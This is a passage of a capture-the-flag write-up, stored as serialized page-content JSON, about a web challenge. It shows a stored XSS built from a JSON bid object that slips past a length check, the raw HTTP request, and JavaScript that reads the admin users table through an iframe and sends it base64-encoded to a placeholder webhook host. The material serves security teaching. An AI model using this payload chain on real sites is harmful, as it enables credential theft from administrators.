:128,"props":6980,"children":6981},{"style":300},[6982],{"type":38,"value":6983}," ?",{"type":33,"tag":128,"props":6985,"children":6986},{"style":523},[6987],{"type":38,"value":6988}," 400\n",{"type":33,"tag":128,"props":6990,"children":6991},{"class":130,"line":1051},[6992,6997,7001,7005,7009,7013,7017,7021,7025,7029,7034,7038,7042,7047,7051,7055,7059,7063,7067,7071,7075,7080,7084,7089,7093],{"type":33,"tag":128,"props":6993,"children":6994},{"style":300},[6995],{"type":38,"value":6996}," :",{"type":33,"tag":128,"props":6998,"children":6999},{"style":312},[7000],{"type":38,"value":2852},{"type":33,"tag":128,"props":7002,"children":7003},{"style":306},[7004],{"type":38,"value":6864},{"type":33,"tag":128,"props":7006,"children":7007},{"style":312},[7008],{"type":38,"value":215},{"type":33,"tag":128,"props":7010,"children":7011},{"style":306},[7012],{"type":38,"value":6948},{"type":33,"tag":128,"props":7014,"children":7015},{"style":312},[7016],{"type":38,"value":215},{"type":33,"tag":128,"props":7018,"children":7019},{"style":135},[7020],{"type":38,"value":6957},{"type":33,"tag":128,"props":7022,"children":7023},{"style":312},[7024],{"type":38,"value":5566},{"type":33,"tag":128,"props":7026,"children":7027},{"style":676},[7028],{"type":38,"value":6040},{"type":33,"tag":128,"props":7030,"children":7031},{"style":140},[7032],{"type":38,"value":7033},"not found",{"type":33,"tag":128,"props":7035,"children":7036},{"style":676},[7037],{"type":38,"value":6040},{"type":33,"tag":128,"props":7039,"children":7040},{"style":312},[7041],{"type":38,"value":2966},{"type":33,"tag":128,"props":7043,"children":7044},{"style":300},[7045],{"type":38,"value":7046}," ||",{"type":33,"tag":128,"props":7048,"children":7049},{"style":306},[7050],{"type":38,"value":6915},{"type":33,"tag":128,"props":7052,"children":7053},{"style":312},[7054],{"type":38,"value":215},{"type":33,"tag":128,"props":7056,"children":7057},{"style":306},[7058],{"type":38,"value":6948},{"type":33,"tag":128,"props":7060,"children":7061},{"style":312},[7062],{"type":38,"value":215},{"type":33,"tag":128,"props":7064,"children":7065},{"style":135},[7066],{"type":38,"value":6957},{"type":33,"tag":128,"props":7068,"children":7069},{"style":312},[7070],{"type":38,"value":5566},{"type":33,"tag":128,"props":7072,"children":7073},{"style":676},[7074],{"type":38,"value":6040},{"type":33,"tag":128,"props":7076,"children":7077},{"style":140},[7078],{"type":38,"value":7079},"closed",{"type":33,"tag":128,"props":7081,"children":7082},{"style":676},[7083],{"type":38,"value":6040},{"type":33,"tag":128,"props":7085,"children":7086},{"style":312},[7087],{"type":38,"value":7088},"))",{"type":33,"tag":128,"props":7090,"children":7091},{"style":300},[7092],{"type":38,"value":6983},{"type":33,"tag":128,"props":7094,"children":7095},{"style":523},[7096],{"type":38,"value":7097}," 404\n",{"type":33,"tag":128,"props":7099,"children":7100},{"class":130,"line":1063},[7101,7105,7110],{"type":33,"tag":128,"props":7102,"children":7103},{"style":300},[7104],{"type":38,"value":6996},{"type":33,"tag":128,"props":7106,"children":7107},{"style":523},[7108],{"type":38,"value":7109}," 500",{"type":33,"tag":128,"props":7111,"children":7112},{"style":312},[7113],{"type":38,"value":5676},{"type":33,"tag":128,"props":7115,"children":7116},{"class":130,"line":1076},[7117,7121,7125,7129,7133,7137,7141,7145,7149,7153,7157,7161,7165,7169,7173,7177,7181,7185,7189,7193,7197,7202,7206],{"type":33,"tag":128,"props":7118,"children":7119},{"style":1576},[7120],{"type":38,"value":6810},{"type":33,"tag":128,"props":7122,"children":7123},{"style":306},[7124],{"type":38,"value":5616},{"type":33,"tag":128,"props":7126,"children":7127},{"style":312},[7128],{"type":38,"value":215},{"type":33,"tag":128,"props":7130,"children":7131},{"style":135},[7132],{"type":38,"value":6686},{"type":33,"tag":128,"props":7134,"children":7135},{"style":312},[7136],{"type":38,"value":5566},{"type":33,"tag":128,"props":7138,"children":7139},{"style":306},[7140],{"type":38,"value":6686},{"type":33,"tag":128,"props":7142,"children":7143},{"style":312},[7144],{"type":38,"value":6700},{"type":33,"tag":128,"props":7146,"children":7147},{"style":135},[7148],{"type":38,"value":633},{"type":33,"tag":128,"props":7150,"children":7151},{"style":312},[7152],{"type":38,"value":5836},{"type":33,"tag":128,"props":7154,"children":7155},{"style":437},[7156],{"type":38,"value":5841},{"type":33,"tag":128,"props":7158,"children":7159},{"style":312},[7160],{"type":38,"value":284},{"type":33,"tag":128,"props":7162,"children":7163},{"style":1576},[7164],{"type":38,"value":6721},{"type":33,"tag":128,"props":7166,"children":7167},{"style":312},[7168],{"type":38,"value":5584},{"type":33,"tag":128,"props":7170,"children":7171},{"style":437},[7172],{"type":38,"value":6730},{"type":33,"tag":128,"props":7174,"children":7175},{"style":312},[7176],{"type":38,"value":284},{"type":33,"tag":128,"props":7178,"children":7179},{"style":306},[7180],{"type":38,"value":6915},{"type":33,"tag":128,"props":7182,"children":7183},{"style":312},[7184],{"type":38,"value":215},{"type":33,"tag":128,"props":7186,"children":7187},{"style":306},[7188],{"type":38,"value":6948},{"type":33,"tag":128,"props":7190,"children":7191},{"style":300},[7192],{"type":38,"value":7046},{"type":33,"tag":128,"props":7194,"children":7195},{"style":676},[7196],{"type":38,"value":6739},{"type":33,"tag":128,"props":7198,"children":7199},{"style":140},[7200],{"type":38,"value":7201},"Internal server error.",{"type":33,"tag":128,"props":7203,"children":7204},{"style":676},[7205],{"type":38,"value":6040},{"type":33,"tag":128,"props":7207,"children":7208},{"style":312},[7209],{"type":38,"value":5863},{"type":33,"tag":128,"props":7211,"children":7212},{"class":130,"line":1089},[7213],{"type":33,"tag":128,"props":7214,"children":7215},{"style":312},[7216],{"type":38,"value":845},{"type":33,"tag":128,"props":7218,"children":7219},{"class":130,"line":1101},[7220],{"type":33,"tag":128,"props":7221,"children":7222},{"style":312},[7223],{"type":38,"value":5902},{"type":33,"tag":47,"props":7225,"children":7226},{},[7227],{"type":38,"value":7228},"However, we can see in the code that no type checking is performed. It is therefore entirely possible to submit a JSON object with a length element less than 10 to pass this check:",{"type":33,"tag":114,"props":7230,"children":7231},{"lang":633},[7232],{"type":33,"tag":119,"props":7233,"children":7235},{"className":637,"code":7234,"language":633,"meta":8,"style":8},"{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror=alert(1)>\"}}\n",[7236],{"type":33,"tag":105,"props":7237,"children":7238},{"__ignoreMap":8},[7239],{"type":33,"tag":128,"props":7240,"children":7241},{"class":130,"line":131},[7242,7247,7251,7255,7259,7264,7268,7272,7276,7280,7285,7289,7293,7298,7302,7306,7310,7315,7319],{"type":33,"tag":128,"props":7243,"children":7244},{"style":312},[7245],{"type":38,"value":7246},"{",{"type":33,"tag":128,"props":7248,"children":7249},{"style":656},[7250],{"type":38,"value":669},{"type":33,"tag":128,"props":7252,"children":7253},{"style":437},[7254],{"type":38,"value":6634},{"type":33,"tag":128,"props":7256,"children":7257},{"style":656},[7258],{"type":38,"value":669},{"type":33,"tag":128,"props":7260,"children":7261},{"style":312},[7262],{"type":38,"value":7263},":{",{"type":33,"tag":128,"props":7265,"children":7266},{"style":656},[7267],{"type":38,"value":669},{"type":33,"tag":128,"props":7269,"children":7270},{"style":437},[7271],{"type":38,"value":6643},{"type":33,"tag":128,"props":7273,"children":7274},{"style":656},[7275],{"type":38,"value":669},{"type":33,"tag":128,"props":7277,"children":7278},{"style":312},[7279],{"type":38,"value":284},{"type":33,"tag":128,"props":7281,"children":7282},{"style":523},[7283],{"type":38,"value":7284},"1",{"type":33,"tag":128,"props":7286,"children":7287},{"style":312},[7288],{"type":38,"value":5584},{"type":33,"tag":128,"props":7290,"children":7291},{"style":656},[7292],{"type":38,"value":669},{"type":33,"tag":128,"props":7294,"children":7295},{"style":437},[7296],{"type":38,"value":7297},"o",{"type":33,"tag":128,"props":7299,"children":7300},{"style":656},[7301],{"type":38,"value":669},{"type":33,"tag":128,"props":7303,"children":7304},{"style":312},[7305],{"type":38,"value":284},{"type":33,"tag":128,"props":7307,"children":7308},{"style":676},[7309],{"type":38,"value":669},{"type":33,"tag":128,"props":7311,"children":7312},{"style":140},[7313],{"type":38,"value":7314},"a'>\u003Cimg src=x onerror=alert(1)>",{"type":33,"tag":128,"props":7316,"children":7317},{"style":676},[7318],{"type":38,"value":669},{"type":33,"tag":128,"props":7320,"children":7321},{"style":312},[7322],{"type":38,"value":7323},"}}\n",{"type":33,"tag":47,"props":7325,"children":7326},{},[7327,7329,7334],{"type":38,"value":7328},"Additionally, in the template part that contains the injection, the dump keyword will convert the object we provide to a string which will then be passed to safe. This means that we can inject a JSON object with a length of 1 and an XSS payload in the ",{"type":33,"tag":105,"props":7330,"children":7332},{"className":7331},[],[7333],{"type":38,"value":7297},{"type":38,"value":7335}," field.",{"type":33,"tag":114,"props":7337,"children":7338},{"lang":1561},[7339],{"type":33,"tag":119,"props":7340,"children":7342},{"className":1565,"code":7341,"language":1561,"meta":8,"style":8},"POST /api/auctions/1/bids HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 58\nCookie: connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n\n{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror=alert(1)>\"}}\n",[7343],{"type":33,"tag":105,"props":7344,"children":7345},{"__ignoreMap":8},[7346,7373,7385,7396,7408,7421,7428],{"type":33,"tag":128,"props":7347,"children":7348},{"class":130,"line":131},[7349,7353,7358,7363,7368],{"type":33,"tag":128,"props":7350,"children":7351},{"style":1576},[7352],{"type":38,"value":1406},{"type":33,"tag":128,"props":7354,"children":7355},{"style":323},[7356],{"type":38,"value":7357}," /api/auctions/1/bids ",{"type":33,"tag":128,"props":7359,"children":7360},{"style":1576},[7361],{"type":38,"value":7362},"HTTP",{"type":33,"tag":128,"props":7364,"children":7365},{"style":323},[7366],{"type":38,"value":7367},"/",{"type":33,"tag":128,"props":7369,"children":7370},{"style":523},[7371],{"type":38,"value":7372},"1.1\n",{"type":33,"tag":128,"props":7374,"children":7375},{"class":130,"line":362},[7376,7380],{"type":33,"tag":128,"props":7377,"children":7378},{"style":1576},[7379],{"type":38,"value":1591},{"type":33,"tag":128,"props":7381,"children":7382},{"style":140},[7383],{"type":38,"value":7384}," localhost:1337\n",{"type":33,"tag":128,"props":7386,"children":7387},{"class":130,"line":403},[7388,7392],{"type":33,"tag":128,"props":7389,"children":7390},{"style":1576},[7391],{"type":38,"value":1630},{"type":33,"tag":128,"props":7393,"children":7394},{"style":140},[7395],{"type":38,"value":1635},{"type":33,"tag":128,"props":7397,"children":7398},{"class":130,"line":739},[7399,7403],{"type":33,"tag":128,"props":7400,"children":7401},{"style":1576},[7402],{"type":38,"value":1643},{"type":33,"tag":128,"props":7404,"children":7405},{"style":140},[7406],{"type":38,"value":7407}," 58\n",{"type":33,"tag":128,"props":7409,"children":7410},{"class":130,"line":765},[7411,7416],{"type":33,"tag":128,"props":7412,"children":7413},{"style":1576},[7414],{"type":38,"value":7415},"Cookie:",{"type":33,"tag":128,"props":7417,"children":7418},{"style":140},[7419],{"type":38,"value":7420}," connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n",{"type":33,"tag":128,"props":7422,"children":7423},{"class":130,"line":804},[7424],{"type":33,"tag":128,"props":7425,"children":7426},{"emptyLinePlaceholder":896},[7427],{"type":38,"value":899},{"type":33,"tag":128,"props":7429,"children":7430},{"class":130,"line":839},[7431,7435,7439,7443,7447,7451,7455,7459,7463,7467,7471,7475,7479,7483,7487,7491,7495,7499,7503],{"type":33,"tag":128,"props":7432,"children":7433},{"style":312},[7434],{"type":38,"value":7246},{"type":33,"tag":128,"props":7436,"children":7437},{"style":656},[7438],{"type":38,"value":669},{"type":33,"tag":128,"props":7440,"children":7441},{"style":437},[7442],{"type":38,"value":6634},{"type":33,"tag":128,"props":7444,"children":7445},{"style":656},[7446],{"type":38,"value":669},{"type":33,"tag":128,"props":7448,"children":7449},{"style":312},[7450],{"type":38,"value":7263},{"type":33,"tag":128,"props":7452,"children":7453},{"style":656},[7454],{"type":38,"value":669},{"type":33,"tag":128,"props":7456,"children":7457},{"style":437},[7458],{"type":38,"value":6643},{"type":33,"tag":128,"props":7460,"children":7461},{"style":656},[7462],{"type":38,"value":669},{"type":33,"tag":128,"props":7464,"children":7465},{"style":312},[7466],{"type":38,"value":284},{"type":33,"tag":128,"props":7468,"children":7469},{"style":523},[7470],{"type":38,"value":7284},{"type":33,"tag":128,"props":7472,"children":7473},{"style":312},[7474],{"type":38,"value":5584},{"type":33,"tag":128,"props":7476,"children":7477},{"style":656},[7478],{"type":38,"value":669},{"type":33,"tag":128,"props":7480,"children":7481},{"style":437},[7482],{"type":38,"value":7297},{"type":33,"tag":128,"props":7484,"children":7485},{"style":656},[7486],{"type":38,"value":669},{"type":33,"tag":128,"props":7488,"children":7489},{"style":312},[7490],{"type":38,"value":284},{"type":33,"tag":128,"props":7492,"children":7493},{"style":676},[7494],{"type":38,"value":669},{"type":33,"tag":128,"props":7496,"children":7497},{"style":140},[7498],{"type":38,"value":7314},{"type":33,"tag":128,"props":7500,"children":7501},{"style":676},[7502],{"type":38,"value":669},{"type":33,"tag":128,"props":7504,"children":7505},{"style":312},[7506],{"type":38,"value":7323},{"type":33,"tag":47,"props":7508,"children":7509},{},[7510],{"type":38,"value":7511},"After sending the data, if we go to the auction/1 page, we can see that our XSS is successfully triggered:",{"type":33,"tag":75,"props":7513,"children":7515},{"imgSrc":7514},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743103381/writeups/aurors-archive/xss_alert.webp",[],{"type":33,"tag":47,"props":7517,"children":7518},{},[7519],{"type":38,"value":7520},"From now on, the path is to retrieve the admin password, so we will test our XSS payload on the admin area to better calibrate our attack and be able to send a functional payload to the admin",{"type":33,"tag":47,"props":7522,"children":7523},{},[7524],{"type":38,"value":7525},"I tested several approaches, notably with fetches but none of them worked on my end. What seemed the simplest at first glance was to work with an iframe since our XSS is on the same origin as the page that displays the user table passwords, we can interact with the iframe however we want.",{"type":33,"tag":47,"props":7527,"children":7528},{},[7529],{"type":38,"value":7530},"We will therefore create an iframe that will render the /admin page:",{"type":33,"tag":114,"props":7532,"children":7533},{"lang":5526},[7534],{"type":33,"tag":119,"props":7535,"children":7537},{"className":5530,"code":7536,"language":5526,"meta":8,"style":8},"let iframe = document.createElement(\"iframe\");\niframe.src = `/admin`;\niframe.width = 800;\niframe.height = 600;\ndocument.body.appendChild(iframe);\n",[7538],{"type":33,"tag":105,"props":7539,"children":7540},{"__ignoreMap":8},[7541,7593,7630,7659,7688],{"type":33,"tag":128,"props":7542,"children":7543},{"class":130,"line":131},[7544,7549,7554,7558,7563,7567,7572,7576,7580,7585,7589],{"type":33,"tag":128,"props":7545,"children":7546},{"style":300},[7547],{"type":38,"value":7548},"let",{"type":33,"tag":128,"props":7550,"children":7551},{"style":306},[7552],{"type":38,"value":7553}," iframe",{"type":33,"tag":128,"props":7555,"children":7556},{"style":312},[7557],{"type":38,"value":5657},{"type":33,"tag":128,"props":7559,"children":7560},{"style":306},[7561],{"type":38,"value":7562}," document",{"type":33,"tag":128,"props":7564,"children":7565},{"style":312},[7566],{"type":38,"value":215},{"type":33,"tag":128,"props":7568,"children":7569},{"style":135},[7570],{"type":38,"value":7571},"createElement",{"type":33,"tag":128,"props":7573,"children":7574},{"style":312},[7575],{"type":38,"value":5566},{"type":33,"tag":128,"props":7577,"children":7578},{"style":676},[7579],{"type":38,"value":669},{"type":33,"tag":128,"props":7581,"children":7582},{"style":140},[7583],{"type":38,"value":7584},"iframe",{"type":33,"tag":128,"props":7586,"children":7587},{"style":676},[7588],{"type":38,"value":669},{"type":33,"tag":128,"props":7590,"children":7591},{"style":312},[7592],{"type":38,"value":5815},{"type":33,"tag":128,"props":7594,"children":7595},{"class":130,"line":362},[7596,7600,7604,7609,7613,7617,7622,7626],{"type":33,"tag":128,"props":7597,"children":7598},{"style":306},[7599],{"type":38,"value":7584},{"type":33,"tag":128,"props":7601,"children":7602},{"style":312},[7603],{"type":38,"value":215},{"type":33,"tag":128,"props":7605,"children":7606},{"style":306},[7607],{"type":38,"value":7608},"src",{"type":33,"tag":128,"props":7610,"children":7611},{"style":312},[7612],{"type":38,"value":5657},{"type":33,"tag":128,"props":7614,"children":7615},{"style":676},[7616],{"type":38,"value":5710},{"type":33,"tag":128,"props":7618,"children":7619},{"style":140},[7620],{"type":38,"value":7621},"/admin",{"type":33,"tag":128,"props":7623,"children":7624},{"style":676},[7625],{"type":38,"value":5739},{"type":33,"tag":128,"props":7627,"children":7628},{"style":312},[7629],{"type":38,"value":5676},{"type":33,"tag":128,"props":7631,"children":7632},{"class":130,"line":403},[7633,7637,7641,7646,7650,7655],{"type":33,"tag":128,"props":7634,"children":7635},{"style":306},[7636],{"type":38,"value":7584},{"type":33,"tag":128,"props":7638,"children":7639},{"style":312},[7640],{"type":38,"value":215},{"type":33,"tag":128,"props":7642,"children":7643},{"style":306},[7644],{"type":38,"value":7645},"width",{"type":33,"tag":128,"props":7647,"children":7648},{"style":312},[7649],{"type":38,"value":5657},{"type":33,"tag":128,"props":7651,"children":7652},{"style":523},[7653],{"type":38,"value":7654}," 800",{"type":33,"tag":128,"props":7656,"children":7657},{"style":312},[7658],{"type":38,"value":5676},{"type":33,"tag":128,"props":7660,"children":7661},{"class":130,"line":739},[7662,7666,7670,7675,7679,7684],{"type":33,"tag":128,"props":7663,"children":7664},{"style":306},[7665],{"type":38,"value":7584},{"type":33,"tag":128,"props":7667,"children":7668},{"style":312},[7669],{"type":38,"value":215},{"type":33,"tag":128,"props":7671,"children":7672},{"style":306},[7673],{"type":38,"value":7674},"height",{"type":33,"tag":128,"props":7676,"children":7677},{"style":312},[7678],{"type":38,"value":5657},{"type":33,"tag":128,"props":7680,"children":7681},{"style":523},[7682],{"type":38,"value":7683}," 600",{"type":33,"tag":128,"props":7685,"children":7686},{"style":312},[7687],{"type":38,"value":5676},{"type":33,"tag":128,"props":7689,"children":7690},{"class":130,"line":765},[7691,7696,7700,7704,7708,7713,7717,7721],{"type":33,"tag":128,"props":7692,"children":7693},{"style":306},[7694],{"type":38,"value":7695},"document",{"type":33,"tag":128,"props":7697,"children":7698},{"style":312},[7699],{"type":38,"value":215},{"type":33,"tag":128,"props":7701,"children":7702},{"style":306},[7703],{"type":38,"value":5671},{"type":33,"tag":128,"props":7705,"children":7706},{"style":312},[7707],{"type":38,"value":215},{"type":33,"tag":128,"props":7709,"children":7710},{"style":135},[7711],{"type":38,"value":7712},"appendChild",{"type":33,"tag":128,"props":7714,"children":7715},{"style":312},[7716],{"type":38,"value":5566},{"type":33,"tag":128,"props":7718,"children":7719},{"style":306},[7720],{"type":38,"value":7584},{"type":33,"tag":128,"props":7722,"children":7723},{"style":312},[7724],{"type":38,"value":5815},{"type":33,"tag":47,"props":7726,"children":7727},{},[7728],{"type":38,"value":7729},"Result:",{"type":33,"tag":75,"props":7731,"children":7733},{"imgSrc":7732},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743104159/writeups/aurors-archive/iframe_first_step.webp",[],{"type":33,"tag":47,"props":7735,"children":7736},{},[7737],{"type":38,"value":7738},"We will now click on the last element of the list which is the users table:",{"type":33,"tag":114,"props":7740,"children":7741},{"lang":5526},[7742],{"type":33,"tag":119,"props":7743,"children":7745},{"className":5530,"code":7744,"language":5526,"meta":8,"style":8},"document.querySelector('iframe').contentWindow.document.querySelectorAll('li').at(-1).click()\n",[7746],{"type":33,"tag":105,"props":7747,"children":7748},{"__ignoreMap":8},[7749],{"type":33,"tag":128,"props":7750,"children":7751},{"class":130,"line":131},[7752,7756,7760,7765,7769,7773,7777,7781,7785,7790,7794,7798,7802,7807,7811,7815,7819,7823,7827,7832,7836,7840,7844,7848,7853],{"type":33,"tag":128,"props":7753,"children":7754},{"style":306},[7755],{"type":38,"value":7695},{"type":33,"tag":128,"props":7757,"children":7758},{"style":312},[7759],{"type":38,"value":215},{"type":33,"tag":128,"props":7761,"children":7762},{"style":135},[7763],{"type":38,"value":7764},"querySelector",{"type":33,"tag":128,"props":7766,"children":7767},{"style":312},[7768],{"type":38,"value":5566},{"type":33,"tag":128,"props":7770,"children":7771},{"style":676},[7772],{"type":38,"value":6040},{"type":33,"tag":128,"props":7774,"children":7775},{"style":140},[7776],{"type":38,"value":7584},{"type":33,"tag":128,"props":7778,"children":7779},{"style":676},[7780],{"type":38,"value":6040},{"type":33,"tag":128,"props":7782,"children":7783},{"style":312},[7784],{"type":38,"value":6700},{"type":33,"tag":128,"props":7786,"children":7787},{"style":306},[7788],{"type":38,"value":7789},"contentWindow",{"type":33,"tag":128,"props":7791,"children":7792},{"style":312},[7793],{"type":38,"value":215},{"type":33,"tag":128,"props":7795,"children":7796},{"style":306},[7797],{"type":38,"value":7695},{"type":33,"tag":128,"props":7799,"children":7800},{"style":312},[7801],{"type":38,"value":215},{"type":33,"tag":128,"props":7803,"children":7804},{"style":135},[7805],{"type":38,"value":7806},"querySelectorAll",{"type":33,"tag":128,"props":7808,"children":7809},{"style":312},[7810],{"type":38,"value":5566},{"type":33,"tag":128,"props":7812,"children":7813},{"style":676},[7814],{"type":38,"value":6040},{"type":33,"tag":128,"props":7816,"children":7817},{"style":140},[7818],{"type":38,"value":243},{"type":33,"tag":128,"props":7820,"children":7821},{"style":676},[7822],{"type":38,"value":6040},{"type":33,"tag":128,"props":7824,"children":7825},{"style":312},[7826],{"type":38,"value":6700},{"type":33,"tag":128,"props":7828,"children":7829},{"style":135},[7830],{"type":38,"value":7831},"at",{"type":33,"tag":128,"props":7833,"children":7834},{"style":312},[7835],{"type":38,"value":5566},{"type":33,"tag":128,"props":7837,"children":7838},{"style":300},[7839],{"type":38,"value":907},{"type":33,"tag":128,"props":7841,"children":7842},{"style":523},[7843],{"type":38,"value":7284},{"type":33,"tag":128,"props":7845,"children":7846},{"style":312},[7847],{"type":38,"value":6700},{"type":33,"tag":128,"props":7849,"children":7850},{"style":135},[7851],{"type":38,"value":7852},"click",{"type":33,"tag":128,"props":7854,"children":7855},{"style":312},[7856],{"type":38,"value":7857},"()\n",{"type":33,"tag":47,"props":7859,"children":7860},{},[7861],{"type":38,"value":7729},{"type":33,"tag":75,"props":7863,"children":7865},{"imgSrc":7864},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743104209/writeups/aurors-archive/display_user_table.webp",[],{"type":33,"tag":47,"props":7867,"children":7868},{},[7869],{"type":38,"value":7870},"We can now retrieve the table with the following line:",{"type":33,"tag":114,"props":7872,"children":7873},{"lang":5526},[7874],{"type":33,"tag":119,"props":7875,"children":7877},{"className":5530,"code":7876,"language":5526,"meta":8,"style":8},">> document.querySelector('iframe').contentWindow.document.body.querySelector('table').innerHTML\n\"\u003Cthead>\u003Ctr>\u003Cth>id\u003C/th>\u003Cth>username\u003C/th>\u003Cth>password\u003C/th>\u003C/tr>\u003C/thead> \u003Ctbody>\u003Ctr>\u003Ctd>1\u003C/td>\u003Ctd>admin\u003C/td>\u003Ctd>admin\u003C/td>\u003C/tr>\u003C/tbody>\" \n",[7878],{"type":33,"tag":105,"props":7879,"children":7880},{"__ignoreMap":8},[7881,7975],{"type":33,"tag":128,"props":7882,"children":7883},{"class":130,"line":131},[7884,7889,7893,7897,7901,7905,7909,7913,7917,7921,7925,7929,7933,7937,7941,7945,7949,7953,7957,7962,7966,7970],{"type":33,"tag":128,"props":7885,"children":7886},{"style":300},[7887],{"type":38,"value":7888},">>",{"type":33,"tag":128,"props":7890,"children":7891},{"style":306},[7892],{"type":38,"value":7562},{"type":33,"tag":128,"props":7894,"children":7895},{"style":312},[7896],{"type":38,"value":215},{"type":33,"tag":128,"props":7898,"children":7899},{"style":135},[7900],{"type":38,"value":7764},{"type":33,"tag":128,"props":7902,"children":7903},{"style":312},[7904],{"type":38,"value":5566},{"type":33,"tag":128,"props":7906,"children":7907},{"style":676},[7908],{"type":38,"value":6040},{"type":33,"tag":128,"props":7910,"children":7911},{"style":140},[7912],{"type":38,"value":7584},{"type":33,"tag":128,"props":7914,"children":7915},{"style":676},[7916],{"type":38,"value":6040},{"type":33,"tag":128,"props":7918,"children":7919},{"style":312},[7920],{"type":38,"value":6700},{"type":33,"tag":128,"props":7922,"children":7923},{"style":306},[7924],{"type":38,"value":7789},{"type":33,"tag":128,"props":7926,"children":7927},{"style":312},[7928],{"type":38,"value":215},{"type":33,"tag":128,"props":7930,"children":7931},{"style":306},[7932],{"type":38,"value":7695},{"type":33,"tag":128,"props":7934,"children":7935},{"style":312},[7936],{"type":38,"value":215},{"type":33,"tag":128,"props":7938,"children":7939},{"style":306},[7940],{"type":38,"value":5671},{"type":33,"tag":128,"props":7942,"children":7943},{"style":312},[7944],{"type":38,"value":215},{"type":33,"tag":128,"props":7946,"children":7947},{"style":135},[7948],{"type":38,"value":7764},{"type":33,"tag":128,"props":7950,"children":7951},{"style":312},[7952],{"type":38,"value":5566},{"type":33,"tag":128,"props":7954,"children":7955},{"style":676},[7956],{"type":38,"value":6040},{"type":33,"tag":128,"props":7958,"children":7959},{"style":140},[7960],{"type":38,"value":7961},"table",{"type":33,"tag":128,"props":7963,"children":7964},{"style":676},[7965],{"type":38,"value":6040},{"type":33,"tag":128,"props":7967,"children":7968},{"style":312},[7969],{"type":38,"value":6700},{"type":33,"tag":128,"props":7971,"children":7972},{"style":306},[7973],{"type":38,"value":7974},"innerHTML\n",{"type":33,"tag":128,"props":7976,"children":7977},{"class":130,"line":362},[7978,7982,7987],{"type":33,"tag":128,"props":7979,"children":7980},{"style":676},[7981],{"type":38,"value":669},{"type":33,"tag":128,"props":7983,"children":7984},{"style":140},[7985],{"type":38,"value":7986},"\u003Cthead>\u003Ctr>\u003Cth>id\u003C/th>\u003Cth>username\u003C/th>\u003Cth>password\u003C/th>\u003C/tr>\u003C/thead> \u003Ctbody>\u003Ctr>\u003Ctd>1\u003C/td>\u003Ctd>admin\u003C/td>\u003Ctd>admin\u003C/td>\u003C/tr>\u003C/tbody>",{"type":33,"tag":128,"props":7988,"children":7989},{"style":676},[7990],{"type":38,"value":836},{"type":33,"tag":47,"props":7992,"children":7993},{},[7994],{"type":38,"value":7995},"After that, we can send it to our webhook. Below is the final payload - timeouts have been added to allow time for the data to be displayed:",{"type":33,"tag":114,"props":7997,"children":7998},{"lang":5526},[7999],{"type":33,"tag":119,"props":8000,"children":8002},{"className":5530,"code":8001,"language":5526,"meta":8,"style":8},"let iframe = document.createElement(\"iframe\");\niframe.src = `/admin`;\ndocument.body.appendChild(iframe);\nsetTimeout(() => {\n document.querySelector('iframe').contentWindow.document.querySelectorAll('li')[3].click()\n setTimeout(() => {\n window.location = '//\u003CWEBHOOK>/?userstable=' + btoa(document.querySelector('iframe').contentWindow.document.body.querySelector('table').innerHTML)\n }, 1000);\n}, 1000);\n",[8003],{"type":33,"tag":105,"props":8004,"children":8005},{"__ignoreMap":8},[8006,8053,8088,8123,8144,8239,8259,8396,8413],{"type":33,"tag":128,"props":8007,"children":8008},{"class":130,"line":131},[8009,8013,8017,8021,8025,8029,8033,8037,8041,8045,8049],{"type":33,"tag":128,"props":8010,"children":8011},{"style":300},[8012],{"type":38,"value":7548},{"type":33,"tag":128,"props":8014,"children":8015},{"style":306},[8016],{"type":38,"value":7553},{"type":33,"tag":128,"props":8018,"children":8019},{"style":312},[8020],{"type":38,"value":5657},{"type":33,"tag":128,"props":8022,"children":8023},{"style":306},[8024],{"type":38,"value":7562},{"type":33,"tag":128,"props":8026,"children":8027},{"style":312},[8028],{"type":38,"value":215},{"type":33,"tag":128,"props":8030,"children":8031},{"style":135},[8032],{"type":38,"value":7571},{"type":33,"tag":128,"props":8034,"children":8035},{"style":312},[8036],{"type":38,"value":5566},{"type":33,"tag":128,"props":8038,"children":8039},{"style":676},[8040],{"type":38,"value":669},{"type":33,"tag":128,"props":8042,"children":8043},{"style":140},[8044],{"type":38,"value":7584},{"type":33,"tag":128,"props":8046,"children":8047},{"style":676},[8048],{"type":38,"value":669},{"type":33,"tag":128,"props":8050,"children":8051},{"style":312},[8052],{"type":38,"value":5815},{"type":33,"tag":128,"props":8054,"children":8055},{"class":130,"line":362},[8056,8060,8064,8068,8072,8076,8080,8084],{"type":33,"tag":128,"props":8057,"children":8058},{"style":306},[8059],{"type":38,"value":7584},{"type":33,"tag":128,"props":8061,"children":8062},{"style":312},[8063],{"type":38,"value":215},{"type":33,"tag":128,"props":8065,"children":8066},{"style":306},[8067],{"type":38,"value":7608},{"type":33,"tag":128,"props":8069,"children":8070},{"style":312},[8071],{"type":38,"value":5657},{"type":33,"tag":128,"props":8073,"children":8074},{"style":676},[8075],{"type":38,"value":5710},{"type":33,"tag":128,"props":8077,"children":8078},{"style":140},[8079],{"type":38,"value":7621},{"type":33,"tag":128,"props":8081,"children":8082},{"style":676},[8083],{"type":38,"value":5739},{"type":33,"tag":128,"props":8085,"children":8086},{"style":312},[8087],{"type":38,"value":5676},{"type":33,"tag":128,"props":8089,"children":8090},{"class":130,"line":403},[8091,8095,8099,8103,8107,8111,8115,8119],{"type":33,"tag":128,"props":8092,"children":8093},{"style":306},[8094],{"type":38,"value":7695},{"type":33,"tag":128,"props":8096,"children":8097},{"style":312},[8098],{"type":38,"value":215},{"type":33,"tag":128,"props":8100,"children":8101},{"style":306},[8102],{"type":38,"value":5671},{"type":33,"tag":128,"props":8104,"children":8105},{"style":312},[8106],{"type":38,"value":215},{"type":33,"tag":128,"props":8108,"children":8109},{"style":135},[8110],{"type":38,"value":7712},{"type":33,"tag":128,"props":8112,"children":8113},{"style":312},[8114],{"type":38,"value":5566},{"type":33,"tag":128,"props":8116,"children":8117},{"style":